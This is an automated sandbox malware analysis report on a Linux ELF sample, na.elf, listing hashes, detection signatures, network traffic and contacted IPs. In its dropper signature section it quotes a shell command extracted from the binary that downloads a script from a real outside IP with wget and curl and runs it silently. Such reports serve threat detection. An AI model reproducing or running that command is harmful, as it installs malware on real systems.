Linux Analysis Report
na.elf

Overview

General Information

Sample name:	na.elf
Analysis ID:	1528131
MD5:	feb2501341c15f0e59a920d677ecedf1
SHA1:	0c5e45909fe34b729a75e9890784f94b46ad80a2
SHA256:	96b403cc42d1fc59666c8b75aca2cb8e7c2e5772fa0a2057be30f117f00acd04
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Detected TCP or UDP traffic on non-standard ports

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: na.elf

ReversingLabs: Detection: 23%

Found strings indicative of a multi-platform dropper

Source: na.elf

String: reflect.Value.Interface: cannot return value obtained from unexported field or methodreflect: New of type that may not be allocated in heap (possibly undefined cgo C type)b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aefaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab73617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5fcipher: the nonce can't have zero length, or the security of the key will be immediately compromisedcgocheck > 1 mode is no longer supported at runtime. Use GOEXPERIMENT=cgocheck2 at build time instead.39402006196394479212279040100143613805079739270465446667948293404245721771496870329047266088258938001861606973112319394020061963944792122790401001436138050797392704654466679469052796276593991132635693989563081522949135544336539426430051953eb9618e1c9a1f929a21a0b68540eea2da725b99b315f3b8b489918ef109e156193951ec7e937b1652c0bd3bb1bf073573df883d2c34f1ef451fd46b503f0000c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd66011839296a789a3bc0045c8a5fb42c7d1bd998f54449579b446817afbd17273e662c97ee72995ef42640c550b9013fad0761353c7086a272c24088be94769fd166506864797660130609714981900799081393217269435300143305409394463459185543183397656052122559640661454554977296311391480858037121987999716643812574028291115057151686479766013060971498190079908139321726943530014330540939446345918554318339765539424505774633321719753296399637136332111386476861244038034037280889270700544900010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899cd /tmp ; echo uname -a > nite ; chmod 777 nite ; ./nite ; rm -rf nite ; cd /tmp ; echo 'wget http://57.128.197.64/maga.sh ; curl -O http://57.128.197.64/maga.sh ; chmod 777 maga.sh ; ./maga.sh' > good.sh ; chmod 777 good.sh ; ./good.sh > /dev/null 2>&1 &FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.13:50412 -> 129.152.30.246:1001

Source: unknown	TCP traffic detected without corresponding DNS query: 129.152.30.246
Source: unknown	TCP traffic detected without corresponding DNS query: 129.152.30.246
Source: unknown	TCP traffic detected without corresponding DNS query: 129.152.30.246
Source: unknown	TCP traffic detected without corresponding DNS query: 131.14.203.216
Source: unknown	TCP traffic detected without corresponding DNS query: 53.234.196.74
Source: unknown	TCP traffic detected without corresponding DNS query: 191.165.19.151
Source: unknown	TCP traffic detected without corresponding DNS query: 131.14.203.216
Source: unknown	TCP traffic detected without corresponding DNS query: 208.239.137.155
Source: unknown	TCP traffic detected without corresponding DNS query: 94.62.196.199
Source: unknown	TCP traffic detected without corresponding DNS query: 133.93.177.247
Source: unknown	TCP traffic detected without corresponding DNS query: 216.171.26.23
Source: unknown	TCP traffic detected without corresponding DNS query: 0.19.21.180
Source: unknown	TCP traffic detected without corresponding DNS query: 160.19.181.180
Source: unknown	TCP traffic detected without corresponding DNS query: 53.234.196.74
Source: unknown	TCP traffic detected without corresponding DNS query: 191.165.19.151
Source: unknown	TCP traffic detected without corresponding DNS query: 208.239.137.155
Source: unknown	TCP traffic detected without corresponding DNS query: 61.26.154.255
Source: unknown	TCP traffic detected without corresponding DNS query: 94.62.196.199
Source: unknown	TCP traffic detected without corresponding DNS query: 133.93.177.247
Source: unknown	TCP traffic detected without corresponding DNS query: 216.171.26.23
Source: unknown	TCP traffic detected without corresponding DNS query: 0.19.21.180
Source: unknown	TCP traffic detected without corresponding DNS query: 16.183.123.211
Source: unknown	TCP traffic detected without corresponding DNS query: 160.19.181.180
Source: unknown	TCP traffic detected without corresponding DNS query: 34.173.124.192
Source: unknown	TCP traffic detected without corresponding DNS query: 155.9.148.148
Source: unknown	TCP traffic detected without corresponding DNS query: 61.26.154.255
Source: unknown	TCP traffic detected without corresponding DNS query: 73.145.142.184
Source: unknown	TCP traffic detected without corresponding DNS query: 246.111.150.239
Source: unknown	TCP traffic detected without corresponding DNS query: 16.183.123.211
Source: unknown	TCP traffic detected without corresponding DNS query: 20.208.219.167
Source: unknown	TCP traffic detected without corresponding DNS query: 155.167.126.189
Source: unknown	TCP traffic detected without corresponding DNS query: 195.55.150.133
Source: unknown	TCP traffic detected without corresponding DNS query: 251.176.79.219
Source: unknown	TCP traffic detected without corresponding DNS query: 112.204.25.130
Source: unknown	TCP traffic detected without corresponding DNS query: 34.173.124.192
Source: unknown	TCP traffic detected without corresponding DNS query: 155.9.148.148
Source: unknown	TCP traffic detected without corresponding DNS query: 63.100.28.197
Source: unknown	TCP traffic detected without corresponding DNS query: 73.145.142.184
Source: unknown	TCP traffic detected without corresponding DNS query: 246.111.150.239
Source: unknown	TCP traffic detected without corresponding DNS query: 20.208.219.167
Source: unknown	TCP traffic detected without corresponding DNS query: 155.167.126.189
Source: unknown	TCP traffic detected without corresponding DNS query: 195.55.150.133
Source: unknown	TCP traffic detected without corresponding DNS query: 214.34.113.34
Source: unknown	TCP traffic detected without corresponding DNS query: 251.176.79.219
Source: unknown	TCP traffic detected without corresponding DNS query: 144.120.228.209
Source: unknown	TCP traffic detected without corresponding DNS query: 253.35.154.254
Source: unknown	TCP traffic detected without corresponding DNS query: 112.204.25.130
Source: unknown	TCP traffic detected without corresponding DNS query: 63.100.28.197
Source: unknown	TCP traffic detected without corresponding DNS query: 163.243.36.131
Source: unknown	TCP traffic detected without corresponding DNS query: 118.198.83.133

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: na.elf

String found in binary or memory: http://57.128.197.64/maga.sh

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal48.linELF@0/0@2/0

Source: ELF file section

Submission: na.elf

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
59.131.99.25	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
134.53.142.48	unknown	United States	22968	MIAMI-UNIVERSITYUS	false
197.149.99.183	unknown	Nigeria	35074	COBRANET-ASLB	false
177.200.140.218	unknown	unknown	52775	TecleNetSolucoesTecnologicasBR	false
14.218.221.83	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
26.151.45.112	unknown	United States	7922	COMCAST-7922US	false
139.190.114.66	unknown	Pakistan	38547	WITRIBE-AS-APWITRIBEPAKISTANLIMITEDPK	false
122.195.37.228	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
203.255.30.163	unknown	Korea Republic of	18028	GSNU-AS-KRGyeongSangNationalUniversityKR	false
177.234.57.6	unknown	Mexico	13591	MexicoReddeTelecomunicacionesSdeRLdeCVMX	false
34.196.85.229	unknown	United States	14618	AMAZON-AESUS	false
202.7.177.221	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false
172.88.57.159	unknown	United States	20001	TWC-20001-PACWESTUS	false
211.4.56.45	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
164.118.166.234	unknown	United States	10430	WA-K20US	false
206.179.147.179	unknown	Canada	808	GONET-ASN-1CA	false
112.62.187.238	unknown	China	56040	CMNET-GUANGDONG-APChinaMobilecommunicationscorporation	false
24.131.248.152	unknown	United States	7922	COMCAST-7922US	false
148.244.169.236	unknown	Mexico	11172	AlestraSdeRLdeCVMX	false
41.255.181.15	unknown	Libyan Arab Jamahiriya	21003	GPTC-ASLY	false
131.171.142.84	unknown	United States	22877	UMUCUS	false
3.138.214.206	unknown	United States	16509	AMAZON-02US	false
242.239.193.39	unknown	Reserved	unknown	unknown	false
220.188.109.51	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
132.5.19.130	unknown	United States	385	AFCONC-BLOCK1-ASUS	false
36.61.116.40	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
26.119.224.117	unknown	United States	7922	COMCAST-7922US	false
93.124.124.172	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
151.101.174.214	unknown	United States	54113	FASTLYUS	false
208.131.79.242	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false
154.185.86.106	unknown	Egypt	8452	TE-ASTE-ASEG	false
212.87.162.102	unknown	Estonia	47526	BELOUS-ASUA	false
244.113.62.185	unknown	Reserved	unknown	unknown	false
9.228.39.146	unknown	United States	3356	LEVEL3US	false
12.120.42.3	unknown	United States	4466	EASYLINK2US	false
29.80.212.212	unknown	United States	7922	COMCAST-7922US	false
61.156.229.180	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
249.188.28.97	unknown	Reserved	unknown	unknown	false
66.215.147.152	unknown	United States	20115	CHARTER-20115US	false
152.128.54.148	unknown	United States	6400	CompaniaDominicanadeTelefonosSADO	false
174.54.201.24	unknown	United States	7922	COMCAST-7922US	false
153.228.197.36	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
9.92.83.221	unknown	United States	3356	LEVEL3US	false
242.44.40.13	unknown	Reserved	unknown	unknown	false
17.152.255.11	unknown	United States	714	APPLE-ENGINEERINGUS	false
187.175.35.232	unknown	Mexico	8151	UninetSAdeCVMX	false
105.132.49.238	unknown	Morocco	6713	IAM-ASMA	false
190.120.140.131	unknown	Colombia	27831	ColombiaMovilCO	false
14.189.94.158	unknown	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	false
102.148.89.7	unknown	Zambia	37287	ZAIN-ZAMBIAZM	false
128.243.247.249	unknown	United Kingdom	786	JANETJiscServicesLimitedGB	false
145.150.163.0	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
69.188.240.8	unknown	United States	3801	MISNETUS	false
0.43.1.108	unknown	unknown	unknown	unknown	false
178.160.211.216	unknown	Armenia	12297	ARMENTELRepublicofArmeniaAM	false
137.20.186.131	unknown	United States	13688	PSEGUS	false
165.77.115.138	unknown	United States	4725	ODNSoftBankMobileCorpJP	false
243.156.141.128	unknown	Reserved	unknown	unknown	false
244.139.138.246	unknown	Reserved	unknown	unknown	false
1.160.74.55	unknown	Taiwan; Republic of China (ROC)	3462	HINETDataCommunicationBusinessGroupTW	false
17.182.150.195	unknown	United States	714	APPLE-ENGINEERINGUS	false
19.0.95.112	unknown	United States	3	MIT-GATEWAYSUS	false
43.1.45.119	unknown	Japan	4249	LILLY-ASUS	false
118.9.246.86	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
55.181.27.229	unknown	United States	1541	DNIC-ASBLK-01534-01546US	false
220.59.96.111	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
13.132.244.223	unknown	United States	7018	ATT-INTERNET4US	false
59.147.85.170	unknown	Japan	2527	SO-NETSo-netEntertainmentCorporationJP	false
130.156.150.163	unknown	United States	21976	NJEDGE-NETUS	false
13.0.106.91	unknown	United States	7018	ATT-INTERNET4US	false
6.196.147.103	unknown	United States	3356	LEVEL3US	false
241.30.34.179	unknown	Reserved	unknown	unknown	false
86.147.4.131	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
98.163.162.233	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
213.139.236.57	unknown	Georgia	209786	DELTACONSULTINGGE	false
253.240.92.204	unknown	Reserved	unknown	unknown	false
75.238.236.21	unknown	United States	22394	CELLCOUS	false
252.18.37.15	unknown	Reserved	unknown	unknown	false
249.86.180.201	unknown	Reserved	unknown	unknown	false
195.55.150.133	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
151.112.73.114	unknown	United States	32480	LLUMCUS	false
160.214.64.48	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
249.223.62.39	unknown	Reserved	unknown	unknown	false
69.34.123.142	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
120.86.76.227	unknown	China	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
119.100.180.253	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
87.104.142.251	unknown	Denmark	3292	TDCTDCASDK	false
101.79.48.46	unknown	Korea Republic of	38661	HCLC-AS-KRpurplestonesKR	false
148.123.215.141	unknown	Norway	2119	TELENOR-NEXTELTelenorNorgeASNO	false
180.30.210.35	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
30.207.198.248	unknown	United States	7922	COMCAST-7922US	false
106.52.29.67	unknown	China	45090	CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa	false
164.242.94.78	unknown	United States	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
112.253.14.91	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
155.181.80.212	unknown	United States	37532	ZAMRENZM	false
169.219.243.151	unknown	Korea Republic of	37611	AfrihostZA	false
20.119.116.84	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
176.238.18.116	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
133.236.112.178	unknown	Japan	2497	IIJInternetInitiativeJapanIncJP	false
91.38.235.47	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false

Contacted Domains

Name	IP	Active
daisy.ubuntu.com	162.213.35.25	true

ID:	1528131
Product:	CloudBasic
Start time:	16:27:20
Start date:	07.10.2024
Sample:	na.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	feb2501341c15f0e59a920d677ecedf1
SHA1:	0c5e45909fe34b729a75e9890784f94b46ad80a2
SHA256:	96b403cc42d1fc59666c8b75aca2cb8e7c2e5772fa0a2057be30f117f00acd04
Filetype:	ELF Executable and Linkable format (Linux) (4029/14) 49.77%

Linux Analysis Report
na.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Spreading

Networking

System Summary

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
na.elf